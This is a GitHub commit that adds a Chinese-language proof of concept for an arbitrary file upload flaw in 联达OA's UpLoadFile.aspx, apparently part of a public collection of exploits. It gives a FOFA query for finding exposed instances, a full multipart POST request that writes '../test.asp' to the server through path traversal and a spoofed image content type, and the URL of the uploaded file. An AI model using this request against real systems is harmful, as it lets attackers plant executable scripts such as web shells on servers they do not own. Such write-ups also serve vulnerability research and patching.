Create 联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md

This commit is contained in:
wy876 2024-03-28 19:26:58 +08:00 committed by GitHub
parent 0a2c127708
commit 52c08e7622
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,33 @@
## 联达OA-UpLoadFile.aspx存在任意文件上传漏洞
## fofa
```
app="联达OA"
```
## poc
```
POST /FileManage/UpLoadFile.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.1707.77 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 241
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="DesignId"
1
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="../test.asp"
Content-Type: image/png
test
--00content0boundary00--
```
文件路径:
```
http://ip/FileManage/test.asp
```